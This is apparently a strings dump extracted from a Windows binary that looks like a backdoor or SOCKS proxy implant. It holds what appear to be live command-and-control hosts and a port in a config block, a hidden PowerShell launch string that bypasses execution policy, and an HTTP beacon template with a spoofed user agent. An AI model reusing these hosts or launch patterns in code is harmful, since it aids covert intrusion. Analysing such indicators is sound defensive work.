!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
8A_A^A]A\^_[]
SWVATAUAVAWH
(A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
PSWVATAUAVAWH
A_A^A]A\^_[X]
PSWVATAUAVAWH
xorduX
A_A^A]A\^_[X]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
(A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
SWVATAUAVAWH
A_A^A]A\^_[]
wsprintfA
user32.dll
WSAStartup
ioctlsocket
connect
select
WSAIoctl
socket
setsockopt
shutdown
closesocket
getaddrinfo
freeaddrinfo
inet_ntoa
inet_addr
ws2_32.dll
OpenProcessToken
GetTokenInformation
GetSidSubAuthority
advapi32.dll
GetLocalTime
SystemTimeToFileTime
FileTimeToSystemTime
CreateEventA
VirtualAlloc
GetVolumeInformationA
CreateThread
CloseHandle
ExitThread
WaitForSingleObject
SetEvent
GetCurrentProcess
LocalAlloc
LocalFree
VirtualFree
CreateFileA
SetFilePointer
WriteFile
kernel32.dll
GetUserNameExW
GetUserNameExA
secur32.dll
CoInitialize
CoCreateInstance
CoUninitialize
ole32.dll
socks64.dll
rundll
BEGINDATA
HOST1:65.21.119.52
HOST2:localhost.exchange
PORT1:4277
a2guard.exe
start2
ALLUSERSPROFILE
win32app
Microsoft
ntdll.dll
LoadLibraryA
powershell
-WindowStyle Hidden -ep bypass -file "
kernel32.dll
RtlGetVersion
GET %s HTTP/1.0
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Connection: close